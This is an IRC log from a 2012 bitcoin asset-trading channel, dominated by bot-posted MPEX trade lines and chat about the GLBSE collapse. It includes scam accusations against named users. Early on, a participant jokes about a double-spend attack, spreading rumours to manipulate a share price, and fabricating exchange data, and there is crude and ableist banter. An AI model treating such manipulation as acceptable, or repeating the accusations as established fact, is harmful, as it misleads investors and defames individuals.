price Nov 15 01:26:54 lol Nov 15 01:27:37 oh, wait till i finish my doublespending attack on satoshidice, too Nov 15 01:28:08 wow, i got paid from GIGA Nov 15 01:28:18 might as well pump that one if we're dumping the others Nov 15 01:29:04 so F.GIGA.WTF it isn't set to cancel anymore? Nov 15 01:29:34 i think it is, but i'm going to spread the rumor that its paying out dividends to manipulate the price Nov 15 01:35:42 you're weak manipulator. you should have said "yes, it's staying cause nefario resent those flowers to mpoe-pr" Nov 15 01:37:09 and her heart melted... Nov 15 01:39:10 [MPEX] [S.MPOE] 4508 @ 0.00049945 = 2.2515 BTC [-] Nov 15 01:40:03 here's the hippy dippy pr-man with the hippy dippy weather, man... Nov 15 01:41:15 (ref http://www.youtube.com/watch?v=D1uaw3WIOlc ) Nov 15 01:41:52 just noticed that i did not forget to fabricate 12hr gap in live.coinbr.com data, too :P Nov 15 01:42:47 will refill it tomorrow... too tired Nov 15 01:43:41 see ya Nov 15 01:51:27 lol new android update Nov 15 02:04:25 [MPEX] [S.MPOE] 21204 @ 0.0004968 = 10.5341 BTC [-] Nov 15 02:04:26 [MPEX] [S.MPOE] 20083 @ 0.00049621 = 9.9654 BTC [-] Nov 15 02:29:28 [MPEX] [S.MPOE] 6192 @ 0.00049937 = 3.0921 BTC [+] Nov 15 02:37:08 talk down S.BVPS price? How would you do that? Nov 15 02:45:17 pigeons is just being conspirational. Nov 15 02:54:53 [MPEX] [S.MPOE] 16650 @ 0.00050538 = 8.4146 BTC [+] Nov 15 02:59:26 its like BTC-Mining has some form of autism Nov 15 03:20:37 [MPEX] [S.MPOE] 31088 @ 0.00050538 = 15.7113 BTC [+] Nov 15 03:20:38 [MPEX] [S.MPOE] 10312 @ 0.00050609 = 5.2188 BTC [+] Nov 15 03:45:40 [MPEX] [S.MPOE] 15756 @ 0.00050609 = 7.974 BTC [+] Nov 15 03:45:41 [MPEX] [S.MPOE] 9644 @ 0.00050799 = 4.8991 BTC [+] Nov 15 04:11:08 [MPEX] [S.MPOE] 20200 @ 0.00050479 = 10.1968 BTC [-] Nov 15 04:36:11 [MPEX] [S.MPOE] 9800 @ 0.00050479 = 4.9469 BTC [-] Nov 15 04:37:26 dub: eh, I missed most of the prior conversation. My bad. Nov 15 04:37:59 whats up all? Nov 15 04:38:05 mefario fix glbse yet? Nov 15 04:38:10 n* Nov 15 04:40:10 mefario nix glbse ? yeah... Nov 15 04:42:01 :) Nov 15 05:01:32 [MPEX] [S.MPOE] 7222 @ 0.00050313 = 3.6336 BTC [-] Nov 15 05:01:33 [MPEX] [S.MPOE] 1878 @ 0.00050139 = 0.9416 BTC [-] Nov 15 05:26:38 [MPEX] [S.MPOE] 2901 @ 0.00050139 = 1.4545 BTC [-] Nov 15 05:26:39 [MPEX] [S.MPOE] 19250 @ 0.00049803 = 9.5871 BTC [-] Nov 15 05:26:41 [MPEX] [S.MPOE] 18449 @ 0.000498 = 9.1876 BTC [-] Nov 15 05:52:05 [MPEX] [S.MPOE] 26987 @ 0.00050332 = 13.5831 BTC [+] Nov 15 05:53:29 https://btcjam.com/listings/584 Nov 15 06:17:08 [MPEX] [S.MPOE] 15800 @ 0.0004998 = 7.8968 BTC [-] Nov 15 06:17:09 [MPEX] [S.MPOE] 5300 @ 0.000498 = 2.6394 BTC [-] Nov 15 06:41:46 [MPEX] [S.MPOE] 9863 @ 0.00050332 = 4.9642 BTC [+] Nov 15 06:51:07 [MPEX] [S.MPOE] 2206 @ 0.00050799 = 1.1206 BTC [+] Nov 15 06:51:09 [MPEX] [S.MPOE] 27094 @ 0.00050878 = 13.7849 BTC [+] **** BEGIN LOGGING AT Thu Nov 15 16:37:01 2012 Nov 15 16:40:05 [MPEX] [S.MPOE] 18450 @ 0.00049256 = 9.0877 BTC [-] Nov 15 16:49:02 can you change your name on bitcointalk ?! Nov 15 16:49:26 [MPEX] [S.MPOE] 15972 @ 0.00049256 = 7.8672 BTC [-] Nov 15 16:49:28 [MPEX] [S.MPOE] 16128 @ 0.00049255 = 7.9438 BTC [-] Nov 15 16:59:22 [MPEX] [S.MPOE] 23304 @ 0.000493 = 11.4889 BTC [+] Nov 15 17:08:27 [MPEX] [S.MPOE] 3027 @ 0.00049356 = 1.494 BTC [+] Nov 15 17:08:28 [MPEX] [S.MPOE] 34606 @ 0.00049898 = 17.2677 BTC [+] Nov 15 17:17:44 [MPEX] [S.MPOE] 1946 @ 0.000493 = 0.9594 BTC [-] Nov 15 17:17:45 [MPEX] [S.MPOE] 5050 @ 0.00049255 = 2.4874 BTC [-] Nov 15 17:27:06 [MPEX] [S.MPOE] 26202 @ 0.00049255 = 12.9058 BTC [-] Nov 15 17:27:08 [MPEX] [S.MPOE] 15244 @ 0.00049254 = 7.5083 BTC [-] Nov 15 17:36:40 [MPEX] [S.MPOE] 25656 @ 0.00049254 = 12.6366 BTC [-] Nov 15 17:36:42 [MPEX] [S.MPOE] 344 @ 0.00049235 = 0.1694 BTC [-] Nov 15 17:45:46 [MPEX] [S.MPOE] 16650 @ 0.00049235 = 8.1976 BTC [-] Nov 15 17:56:39 [MPEX] [S.MPOE] 27306 @ 0.00049235 = 13.4441 BTC [-] Nov 15 17:56:39 [MPEX] [S.MPOE] 7606 @ 0.00049233 = 3.7447 BTC [-] Nov 15 18:06:07 [MPEX] [S.MPOE] 19944 @ 0.00049233 = 9.819 BTC [-] Nov 15 18:06:09 [MPEX] [S.MPOE] 22276 @ 0.00049213 = 10.9627 BTC [-] Nov 15 18:12:21 [MPEX] [S.DICE] 420 @ 0.00339942 = 1.4278 BTC [+] Nov 15 18:21:29 [MPEX] [S.MPOE] 13441 @ 0.00049213 = 6.6147 BTC [-] Nov 15 18:21:30 [MPEX] [S.MPOE] 7520 @ 0.0004918 = 3.6983 BTC [-] Nov 15 18:30:57 [MPEX] [S.MPOE] 9480 @ 0.0004918 = 4.6623 BTC [-] Nov 15 18:30:57 [MPEX] [S.MPOE] 28012 @ 0.00049168 = 13.7729 BTC [-] Nov 15 18:40:18 [MPEX] [S.MPOE] 7188 @ 0.00049168 = 3.5342 BTC [-] Nov 15 18:40:19 [MPEX] [S.MPOE] 41862 @ 0.00049143 = 20.5722 BTC [-] Nov 15 18:47:25 https://btcjam.com/listings/584 Nov 15 18:49:30 [MPEX] [S.MPOE] 988 @ 0.00049143 = 0.4855 BTC [-] Nov 15 18:49:31 [MPEX] [S.MPOE] 24112 @ 0.00049088 = 11.8361 BTC [-] Nov 15 18:55:51 allow me to recomend https://bitcointalk.org/index.php?topic=124441.0 Nov 15 18:59:58 [MPEX] [S.MPOE] 10950 @ 0.00049088 = 5.3751 BTC [-] Nov 15 19:11:06 [MPEX] [S.MPOE] 19150 @ 0.00049304 = 9.4417 BTC [+] Nov 15 19:11:08 [MPEX] [S.MPOE] 15770 @ 0.00049324 = 7.7784 BTC [+] Nov 15 19:20:29 ;;getrating aethero Nov 15 19:20:30 Currently authenticated from hostmask aethero!~kvirc@gateway/tor-sasl/aethero . User aethero, rated since Wed May 2 16:24:52 2012. Cumulative rating 410, from 192 total ratings. Received ratings: 190 positive, 2 negative. Sent ratings: 187 positive, 16 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=aethero Nov 15 19:20:32 [MPEX] [S.MPOE] 23300 @ 0.00049324 = 11.4925 BTC [+] Nov 15 19:21:34 mircea_popescu: thank you, and we've covered those things ;-) Nov 15 19:21:54 lucidlepidoptera hm ? Nov 15 19:22:12 the link you posted earlier Nov 15 19:22:21 smickles maybe something for you http://www.springwise.com/life_hacks/free-web-platform-offers-open-source-legal-documents-signing-service/ Nov 15 19:22:32 o o. good for you. Nov 15 19:22:33 i mean, as to serve it in teh btc world Nov 15 19:22:46 wasnt directed at you in particular, for sure. Nov 15 19:23:01 mircea_popescu seems aethero guy is invloved in that thingy. Nov 15 19:23:11 well ya, they're together iirc. Nov 15 19:23:26 kakobrekla: aye, aethero and i are Nov 15 19:23:31 "as well as a comprehensive solution for having them verified and signed online." Nov 15 19:23:35 this had better been gpg. Nov 15 19:23:39 or else fuck them. Nov 15 19:29:38 [MPEX] [S.MPOE] 12871 @ 0.00049253 = 6.3394 BTC [-] Nov 15 19:31:14 mircea_popescu: donators can change their names, or else you can ask theymos to do it for you Nov 15 19:31:31 right. Nov 15 19:34:58 ;;later tell kakobrekla thanks, https://secure.gravatar.com/avatar/1037b5d74e4ee5d797b9c86167610713.jpg?s=100&d=identicon << collection letters from a cylon Nov 15 19:34:58 The operation succeeded. Nov 15 19:38:54 [MPEX] [S.MPOE] 14318 @ 0.00049253 = 7.052 BTC [-] Nov 15 19:48:02 [MPEX] [S.MPOE] 5061 @ 0.00049253 = 2.4927 BTC [-] Nov 15 19:48:03 [MPEX] [S.MPOE] 9989 @ 0.00049088 = 4.9034 BTC [-] Nov 15 19:48:04 [MPEX] [S.MPOE] 1450 @ 0.00049082 = 0.7117 BTC [-] Nov 15 19:57:43 [MPEX] [S.MPOE] 24350 @ 0.00049082 = 11.9515 BTC [-] Nov 15 19:57:44 [MPEX] [S.MPOE] 36650 @ 0.00049048 = 17.9761 BTC [-] Nov 15 20:08:37 [MPEX] [S.MPOE] 5900 @ 0.00049123 = 2.8983 BTC [+] Nov 15 20:08:39 [MPEX] [S.MPOE] 5650 @ 0.00049048 = 2.7712 BTC [-] Nov 15 20:08:40 [MPEX] [S.MPOE] 31200 @ 0.00049046 = 15.3024 BTC [-] Nov 15 20:09:39 yet again poking above the 30 day sma Nov 15 20:18:11 [MPEX] [S.MPOE] 12300 @ 0.00049046 = 6.0327 BTC [-] Nov 15 20:27:15 [MPEX] [S.MPOE] 1150 @ 0.00049046 = 0.564 BTC [-] Nov 15 20:27:16 [MPEX] [S.MPOE] 34050 @ 0.00049031 = 16.6951 BTC [-] Nov 15 20:27:18 [MPEX] [S.MPOE] 25300 @ 0.0004901 = 12.3995 BTC [-] Nov 15 20:36:30 [MPEX] [S.MPOE] 20100 @ 0.0004901 = 9.851 BTC [-] Nov 15 20:36:31 [MPEX] [S.MPOE] 18550 @ 0.00049005 = 9.0904 BTC [-] Nov 15 20:45:42 [MPEX] [S.MPOE] 2900 @ 0.00049005 = 1.4211 BTC [-] Nov 15 20:54:55 [MPEX] [S.MPOE] 3950 @ 0.00049005 = 1.9357 BTC [-] Nov 15 20:54:56 [MPEX] [S.MPOE] 1600 @ 0.00049002 = 0.784 BTC [-] Nov 15 21:04:32 [MPEX] [S.MPOE] 33750 @ 0.00049002 = 16.5382 BTC [-] Nov 15 21:07:07 ;;eauth mircea_popescu Nov 15 21:07:07 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Nov 15 21:07:37 ;;everify freenode:#bitcoin-otc:ff73812b0f664cd9c9135c5607573d357b70f791dc90a83d3d7159b6 Nov 15 21:07:38 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Nov 15 21:09:13 ;;rate usagi -10 Ran a complex array of scams. One of the scammers covered by the GLBSE collapse. Nov 15 21:09:14 Rating entry successful. Your rating of -10 for user usagi has been recorded. Nov 15 21:09:28 EskimoBob ^^ Nov 15 21:09:38 the guy is back starting new "business" etc. Nov 15 21:13:46 [MPEX] [S.MPOE] 7607 @ 0.00049002 = 3.7276 BTC [-] Nov 15 21:13:47 [MPEX] [S.MPOE] 22950 @ 0.00049002 = 11.246 BTC [-] Nov 15 21:13:49 [MPEX] [S.MPOE] 9893 @ 0.00048977 = 4.8453 BTC [-] Nov 15 21:23:05 [MPEX] [S.MPOE] 11857 @ 0.00048977 = 5.8072 BTC [-] Nov 15 21:23:07 [MPEX] [S.MPOE] 18550 @ 0.00048975 = 9.0849 BTC [-] Nov 15 21:23:08 [MPEX] [S.MPOE] 9434 @ 0.00048962 = 4.6191 BTC [-] Nov 15 21:32:13 [MPEX] [S.MPOE] 12000 @ 0.00048962 = 5.8754 BTC [-] Nov 15 21:41:24 [MPEX] [S.MPOE] 3936 @ 0.00048962 = 1.9271 BTC [-] Nov 15 21:41:25 [MPEX] [S.MPOE] 24500 @ 0.00048958 = 11.9947 BTC [-] Nov 15 21:41:27 [MPEX] [S.MPOE] 11914 @ 0.00048946 = 5.8314 BTC [-] Nov 15 21:51:15 [MPEX] [S.MPOE] 11744 @ 0.00049074 = 5.7633 BTC [+] Nov 15 22:00:24 [MPEX] [S.MPOE] 26206 @ 0.00049074 = 12.8603 BTC [+] Nov 15 22:00:25 [MPEX] [S.MPOE] 4044 @ 0.00049311 = 1.9941 BTC [+] Nov 15 22:10:29 [MPEX] [S.MPOE] 16779 @ 0.00048946 = 8.2126 BTC [-] Nov 15 22:10:30 [MPEX] [S.MPOE] 6721 @ 0.00048943 = 3.2895 BTC [-] Nov 15 22:16:00 any news from Nefario ? Nov 15 22:18:00 nope. Nov 15 22:20:51 [MPEX] [S.MPOE] 31681 @ 0.00048943 = 15.5056 BTC [-] Nov 15 22:20:52 [MPEX] [S.MPOE] 15869 @ 0.00048931 = 7.7649 BTC [-] Nov 15 22:30:34 [MPEX] [S.MPOE] 20029 @ 0.0004927 = 9.8683 BTC [+] Nov 15 22:30:35 [MPEX] [S.MPOE] 22299 @ 0.00049311 = 10.9959 BTC [+] Nov 15 22:40:19 [MPEX] [S.MPOE] 19307 @ 0.00049311 = 9.5205 BTC [+] Nov 15 22:40:21 [MPEX] [S.MPOE] 13912 @ 0.00049324 = 6.862 BTC [+] Nov 15 22:40:22 [MPEX] [S.MPOE] 162 @ 0.00049369 = 0.08 BTC [+] Nov 15 22:51:26 [MPEX] [S.MPOE] 45450 @ 0.00049251 = 22.3846 BTC [-] Nov 15 22:51:27 [MPEX] [S.MPOE] 7105 @ 0.000492 = 3.4957 BTC [-] Nov 15 23:02:01 [MPEX] [S.MPOE] 5595 @ 0.000492 = 2.7527 BTC [-] Nov 15 23:02:03 [MPEX] [S.MPOE] 48350 @ 0.00049024 = 23.7031 BTC [-] Nov 15 23:02:04 [MPEX] [S.MPOE] 6805 @ 0.00048965 = 3.3321 BTC [-] Nov 15 23:12:14 [MPEX] [S.MPOE] 35700 @ 0.00048965 = 17.4805 BTC [-] Nov 15 23:30:48 [MPEX] [S.MPOE] 7265 @ 0.00048928 = 3.5546 BTC [-] Nov 15 23:30:49 [MPEX] [S.MPOE] 17390 @ 0.00048927 = 8.5084 BTC [-] Nov 15 23:40:21 [MPEX] [S.MPOE] 15900 @ 0.00049209 = 7.8242 BTC [+] Nov 15 23:49:53 [MPEX] [S.MPOE] 6510 @ 0.00048927 = 3.1851 BTC [-] Nov 15 23:49:54 [MPEX] [S.MPOE] 16590 @ 0.00048925 = 8.1167 BTC [-] Nov 15 23:59:51 [MPEX] [S.MPOE] 12560 @ 0.00048925 = 6.145 BTC [-] Nov 15 23:59:53 [MPEX] [S.MPOE] 21300 @ 0.00048925 = 10.421 BTC [-] Nov 15 23:59:54 [MPEX] [S.MPOE] 4740 @ 0.00048875 = 2.3167 BTC [-] Nov 16 00:09:51 [MPEX] [S.MPOE] 18247 @ 0.00049108 = 8.9607 BTC [+] Nov 16 00:18:45 assbot should prolly coalesce the trades, it starts getting a bit overwhelming :) Nov 16 00:18:56 [MPEX] [S.MPOE] 15153 @ 0.00049108 = 7.4413 BTC [+] Nov 16 00:20:05 meh its good time stamp data Nov 16 00:20:39 glad to see the coinbr downage wasnt your fault jurov Nov 16 00:21:24 jurov: don't you find it important to see which orders are filled and when? im not sure how that would work with assbot doing a batch reporting or something Nov 16 00:21:42 it wouldn't be real time or anything -- or am I missing the point? Nov 16 00:24:13 !ticker S.MPOE Nov 16 00:24:14 [MPEX:S.MPOE] 1day: 0.00048875 / 0.0004953 / 0.00050878 (3268968 shares, 1,619.15 BTC), 30day: 0.00041466 / 0.00046843 / 0.00051331 (63005861 shares, 29,514.45 BTC) Nov 16 00:24:32 i like assbot :) Nov 16 00:28:01 [MPEX] [S.MPOE] 21822 @ 0.00048953 = 10.6825 BTC [-] Nov 16 00:28:02 [MPEX] [S.MPOE] 33803 @ 0.00049152 = 16.6149 BTC [+] Nov 16 00:33:22 thestringpuller, yes it is nice to see each order matched. but it seems to drown conversation, too Nov 16 00:37:58 you could ignore it here and watch #bitcoin-assets-trades Nov 16 00:38:32 [MPEX] [S.MPOE] 34938 @ 0.00048962 = 17.1063 BTC [-] Nov 16 00:39:11 me? and how would it help me to follow human conversation here? Nov 16 00:41:21 doing '/ignore assbot #bitcoin-assets' will stop you seeing the trades here, you can join the other channel if you want a record of them Nov 16 00:44:05 or use a regex to only block trades if you want to see ticker triggered stuff Nov 16 00:44:50 jurov lol just you wait Nov 16 00:45:01 next year i hope you'll be lucky if you can get a word in edgewise. Nov 16 00:45:31 but it would be nice if there were two bots, one that did instareporting like assbot and one that did periodic reporting, like half hour or hourly. then people could ignore one or both Nov 16 00:48:16 [MPEX] [S.MPOE] 14534 @ 0.00048962 = 7.1161 BTC [-] Nov 16 00:52:41 thx dub. i'm such a n00b sometimes Nov 16 00:54:58 ;;seen rg Nov 16 00:54:58 rg was last seen in #bitcoin-assets 5 days, 21 hours, 9 minutes, and 20 seconds ago: wow, i guess you showed us. Nov 16 00:55:31 omg rg found a gf ?! Nov 16 00:57:50 [MPEX] [S.MPOE] 31100 @ 0.0004898 = 15.2328 BTC [+] Nov 16 01:07:02 [MPEX] [S.MPOE] 21152 @ 0.00049152 = 10.3966 BTC [+] Nov 16 01:07:04 [MPEX] [S.MPOE] 1291 @ 0.00049209 = 0.6353 BTC [+] Nov 16 01:09:31 rg was last seen in #bitcoin-otc 1 day, 6 hours, 16 minutes, and 18 seconds ago: ;;calc 292 / [ticker --last] Nov 16 01:09:54 praps sick of all the hate for his buddy nefario Nov 16 01:16:07 they were buttbros ?! Nov 16 01:16:33 [MPEX] [S.MPOE] 14257 @ 0.00049295 = 7.028 BTC [+] Nov 16 01:16:35 [MPEX] [S.MPOE] 19020 @ 0.00049153 = 9.3489 BTC [-] Nov 16 01:19:45 i wonder if usagi repaid the advance on his salary his employer gave him to pay dvidends Nov 16 01:22:33 well he was gone for what, a month ? Nov 16 01:22:37 maybe he overtimed Nov 16 01:25:58 [MPEX] [S.MPOE] 33150 @ 0.00049305 = 16.3446 BTC [+] Nov 16 01:25:59 [MPEX] [S.MPOE] 20916 @ 0.00049342 = 10.3204 BTC [+] Nov 16 01:35:25 [MPEX] [S.MPOE] 7830 @ 0.00049153 = 3.8487 BTC [-] Nov 16 01:35:26 [MPEX] [S.MPOE] 970 @ 0.000491 = 0.4763 BTC [-] Nov 16 01:38:42 holy peepeecoins Nov 16 01:39:50 mircea, did you get the email from eeecurrency folks? Nov 16 01:40:08 yes i did, answered the guy, he said he was gonna pop in here Nov 16 01:40:13 dub quite the uptick huh. Nov 16 01:40:36 they asked me first to be listed on coinbr (sic), i explained and wished them good luck Nov 16 01:41:03 aha okays. well i guess he shows up eventually. Nov 16 01:42:51 Hi, i will now tell you how intersango scammed me on 390 euros. Nov 16 01:42:51 It all started with a transfer of around 390 euros to Intersangos bank account on the 6th of septembe Nov 16 01:42:55 hm these keep pouring in... Nov 16 01:44:38 [MPEX] [S.MPOE] 2230 @ 0.000491 = 1.0949 BTC [-] Nov 16 01:44:39 [MPEX] [S.MPOE] 16228 @ 0.00048962 = 7.9456 BTC [-] Nov 16 01:44:40 [MPEX] [S.MPOE] 8942 @ 0.00048875 = 4.3704 BTC [-] Nov 16 01:49:35 http://en.blog.wordpress.com/2012/11/15/pay-another-way-bitcoin/ Nov 16 01:50:36 ohoho Nov 16 01:50:41 that's pretty big. Nov 16 01:54:05 [MPEX] [S.MPOE] 29300 @ 0.00048875 = 14.3204 BTC [-] Nov 16 02:03:27 [MPEX] [S.MPOE] 11700 @ 0.00048904 = 5.7218 BTC [+] Nov 16 02:12:58 [MPEX] [S.MPOE] 25100 @ 0.00049024 = 12.305 BTC [+] Nov 16 02:19:31 hmm might be time to buy Nov 16 02:20:08 oh wtf Nov 16 02:20:12 was time an hour ago Nov 16 02:22:01 [MPEX] [S.MPOE] 35712 @ 0.00049006 = 17.501 BTC [-] Nov 16 02:22:53 lol Nov 16 02:31:46 [MPEX] [S.MPOE] 18400 @ 0.00048994 = 9.0149 BTC [-] Nov 16 02:31:47 A study by the Australian Institute of Criminology of 162 attempted or actual contract murders in Australia between 1989 and 2002 indicated that the most common reason for murder-for-hire was "the dissolution of an intimate relationship". The study also found that the average payment for a "hit" was $12,700 and that the most commonly used weapons were firearms. Nov 16 02:31:47 [MPEX] [S.MPOE] 2888 @ 0.0004895 = 1.4137 BTC [-] Nov 16 02:32:15 i wonder if that average is over all attempts or only over successful ones. Nov 16 02:41:21 [MPEX] [S.MPOE] 37066 @ 0.0004895 = 18.1438 BTC [-] Nov 16 02:42:19 seems expensive Nov 16 02:43:52 http://www.encyclopediabitcoinica.com/wiki/Talk:Main_Page#What_would_be_a_good_way_to_get_more_contributions.3F Nov 16 02:44:01 given that .au is a prison island populated entirely by criminals you'd think they were oversupplied Nov 16 02:45:05 lol y the hate dub ? Nov 16 02:45:52 smickles : the abolition of accounts. Nov 16 02:45:59 ^ Nov 16 02:46:10 also that blinky shit on the left doesn't help. Nov 16 02:46:53 Disclaimer Nov 16 02:46:53 The people mocked on this website, even the real ones, are fictional Nov 16 02:46:59 hahaha that's humorous in and of itself. Nov 16 02:48:53 mircea_popescu: the ad i get is simple text, says "Need to crack some WPA keys?" Nov 16 02:49:25 i got some blinky shit with a pocket knife Nov 16 02:49:45 I'm not sure about your solution tho, the site already gets a shitton of spam Nov 16 02:49:59 some of it is christian rhetoric spam Nov 16 02:50:03 odd Nov 16 02:50:24 [MPEX] [S.MPOE] 8488 @ 0.00049006 = 4.1596 BTC [+] Nov 16 02:50:26 [MPEX] [S.MPOE] 18740 @ 0.00049165 = 9.2135 BTC [+] Nov 16 02:53:45 well im not in the business of solving the site's problems (and if i thought a website is a worthwhile endeavour for a human being i wouldn't have closed my romanian digg thing) Nov 16 02:53:53 i was just saying what's keeping me from contributing Nov 16 02:55:23 heh, I wasn't even really soliciting answers to the question Nov 16 02:55:31 just pimping mentiones of my name Nov 16 02:55:40 hahaha Nov 16 02:55:45 why don;t you start a blog btw ? Nov 16 02:56:44 I've considered it, and have made half-assed attempts in the past Nov 16 02:57:33 fucking enterprise security people hurt my butt Nov 16 02:57:38 best i've done is vlogging to the tune of 22k total views Nov 16 02:57:39 works as a convenient way to gather together your output Nov 16 02:57:51 this internet is almost unusable Nov 16 02:58:01 views is really irrelevant. Nov 16 02:58:36 ok, well, then: Nov 16 02:58:47 best i've done is vlogging to the tune of really irrelevant Nov 16 02:58:53 now you can buy a wordpress with bitcoin too! Nov 16 02:59:07 the primary utility of the blog is documentary. say the boys start discussing women as slaves. i have a handy link of two girls chained to a shopping cart. Nov 16 02:59:22 it's from 2010. if it wasn't on my blog it would practically not exist. Nov 16 02:59:34 [MPEX] [S.MPOE] 111 @ 0.0004895 = 0.0543 BTC [-] Nov 16 03:00:30 everyone gets into this "o, i put up a pic of my lunch and 5498645805 people loaded that page". seems a dubious measure of utility. Nov 16 03:00:50 "this page was a handy reference for X subject 35 times over the past 10 years" seems better. Nov 16 03:08:36 [MPEX] [S.MPOE] 2268 @ 0.00048875 = 1.1085 BTC [-] Nov 16 03:08:38 [MPEX] [S.MPOE] 31032 @ 0.00048872 = 15.166 BTC [-] Nov 16 03:09:29 http://heeeeeeeey.com/ Nov 16 03:17:57 [MPEX] [S.MPOE] 3818 @ 0.00048872 = 1.8659 BTC [-] Nov 16 03:17:58 [MPEX] [S.MPOE] 10182 @ 0.00048867 = 4.9756 BTC [-] Nov 16 03:27:09 [MPEX] [S.MPOE] 24900 @ 0.00048867 = 12.1679 BTC [-] Nov 16 03:36:43 [MPEX] [S.MPOE] 368 @ 0.00048867 = 0.1798 BTC [-] Nov 16 03:41:42 http://www.youtube.com/watch?feature=player_embedded&v=pw42uhVUY0M Nov 16 03:46:35 [MPEX] [S.MPOE] 15651 @ 0.00048864 = 7.6477 BTC [-] Nov 16 03:46:36 [MPEX] [S.MPOE] 9089 @ 0.0004892 = 4.4463 BTC [+] Nov 16 03:46:38 [MPEX] [S.MPOE] 16313 @ 0.00048977 = 7.9896 BTC [+] Nov 16 03:46:39 [MPEX] [S.MPOE] 17347 @ 0.00049165 = 8.5287 BTC [+] Nov 16 03:55:51 [MPEX] [S.MPOE] 13120 @ 0.0004885 = 6.4091 BTC [-] Nov 16 03:55:52 [MPEX] [S.MPOE] 29480 @ 0.00048819 = 14.3918 BTC [-] Nov 16 04:04:59 [MPEX] [S.MPOE] 3820 @ 0.00048819 = 1.8649 BTC [-] Nov 16 04:05:00 [MPEX] [S.MPOE] 2680 @ 0.00048813 = 1.3082 BTC [-] Nov 16 04:16:28 sgornick- did you see the writing contest ? Nov 16 04:17:43 [MPEX] [S.MPOE] 23320 @ 0.00048813 = 11.3832 BTC [-] Nov 16 04:17:44 [MPEX] [S.MPOE] 8080 @ 0.00048808 = 3.9437 BTC [-] Nov 16 04:18:39 Oh crap, that broadcasts that to each channel? Nov 16 04:18:44 d;uh Nov 16 04:18:51 heh, ... oopes. Nov 16 04:18:59 lol Nov 16 04:19:38 ;;bc,24hprc Nov 16 04:19:39 11.08 Nov 16 04:22:10 thats a squatter btw Nov 16 04:22:37 oh maybe not Nov 16 04:27:10 [MPEX] [S.MPOE] 3634 @ 0.00048808 = 1.7737 BTC [-] Nov 16 04:27:12 [MPEX] [S.MPOE] 17424 @ 0.00048798 = 8.5026 BTC [-] Nov 16 04:28:59 sup scammer Nov 16 04:32:25 scammer? what happened? Nov 16 04:32:38 also speaking of scammer is nefario just keeping the btc? ;p; Nov 16 04:33:37 maybe nefario is here? Nov 16 04:33:45 and we just cant see him? Nov 16 04:34:02 are you still trying? i gave up a while ago... Nov 16 04:34:40 what an asshat he is... Nov 16 04:36:12 usagi: from your rating of me, I assume you think I should trust you, or at least be indifferent to you after you defaulted on a contract with me? Nov 16 04:36:34 I understand that we came to an agreeable settlement Nov 16 04:36:45 off to the hospital.. has to make sure im healthy to get clearancy... lulz... peace Nov 16 04:37:16 [MPEX] [S.MPOE] 16424 @ 0.00048966 = 8.0422 BTC [+] Nov 16 04:37:17 oh, i must of missed the guideline that says a rating isn't a reflection of your trust in a user Nov 16 04:37:54 ah, well Nov 16 04:37:59 i don't believe in god Nov 16 04:38:34 you told me you could after glbse went down tho Nov 16 04:39:30 well, I just wanted to ask you about that, Nov 16 04:39:42 huh? an appeal to emotion is a specific logical fallacy? Nov 16 04:40:17 lol its usagi Nov 16 04:41:30 usagi: so what took you so long to rageunquit? Nov 16 04:42:05 you have to wait in line for those. Nov 16 04:42:09 shareholders come first. Nov 16 04:42:42 yes, but your contract was with me, not the company Nov 16 04:42:51 and shareholders come before paying the ceo. Nov 16 04:43:55 knifes or high density computing? Nov 16 04:44:38 i love it: < usagi> It was literally an act of God that GLBSE was shut down at the precise moment I took out those loans Nov 16 04:44:56 nefario == god Nov 16 04:45:23 usagi: yes, this is what dmc's dc was for, that kind of computing Nov 16 04:45:34 smickles: dude, if nefario is god, I want my church donations back Nov 16 04:46:28 Diablo-D3: yeah, i thought tithes were only supposed to be 10% Nov 16 04:46:53 SMICKLES: I DONT KNOW, LETS ASK LUKE! Nov 16 04:46:57 [MPEX] [S.MPOE] 26176 @ 0.00048798 = 12.7734 BTC [-] Nov 16 04:46:58 [MPEX] [S.MPOE] 5124 @ 0.0004876 = 2.4985 BTC [-] Nov 16 04:47:01 oh wait, I have that religious freak on ignore :3 Nov 16 04:48:03 I sacrifice the third son of hrothgar unto the, Luke-Jr Nov 16 04:48:16 BE SUMMONED! Nov 16 04:48:49 sup bros Nov 16 04:56:22 [MPEX] [S.MPOE] 11476 @ 0.0004876 = 5.5957 BTC [-] Nov 16 04:56:24 [MPEX] [S.MPOE] 26674 @ 0.00048752 = 13.0041 BTC [-] Nov 16 05:05:52 [MPEX] [S.MPOE] 11300 @ 0.00048752 = 5.509 BTC [-] **** BEGIN LOGGING AT Fri Nov 16 09:32:14 2012 Nov 16 09:36:43 [MPEX] [S.MPOE] 14211 @ 0.00048863 = 6.9439 BTC [+] Nov 16 09:36:44 [MPEX] [S.MPOE] 22389 @ 0.00049105 = 10.9941 BTC [+] Nov 16 09:46:40 [MPEX] [S.MPOE] 2636 @ 0.00049105 = 1.2944 BTC [+] Nov 16 09:46:40 [MPEX] [S.MPOE] 12514 @ 0.00049193 = 6.156 BTC [+] Nov 16 09:47:40 mornin mr.P Nov 16 09:49:05 heya mr k Nov 16 09:49:33 mircea_popescu: u talking to me? :D Nov 16 09:49:35 was that you ? Nov 16 09:50:04 lol Nov 16 09:50:10 hehe Nov 16 09:50:38 brb Nov 16 09:57:41 [MPEX] [S.MPOE] 5050 @ 0.00049193 = 2.4842 BTC [+] Nov 16 10:08:34 [MPEX] [S.MPOE] 1524 @ 0.00049193 = 0.7497 BTC [+] Nov 16 10:08:35 [MPEX] [S.MPOE] 21350 @ 0.00049218 = 10.508 BTC [+] Nov 16 10:08:37 [MPEX] [S.MPOE] 776 @ 0.00049291 = 0.3825 BTC [+] Nov 16 10:10:19 this song is seriously supposed to be about and named after usagi: http://www.soundclick.com/bands/page_songInfo.cfm?bandID=24002&songID=243091 Nov 16 10:13:18 isn't usagi a common word ? Nov 16 10:13:24 like, persay, milk ? Nov 16 10:16:43 well its our usagi https://groups.google.com/forum/#!msg/rec.martial-arts/ly5cmb5i8bc/aBX3EztwQ4YJ Nov 16 10:17:23 in the forum he talks about how he's been posting under his real name in rec.martial-arts Nov 16 10:17:56 [MPEX] [S.MPOE] 13274 @ 0.00049291 = 6.5429 BTC [+] Nov 16 10:17:58 [MPEX] [S.MPOE] 23634 @ 0.00049342 = 11.6615 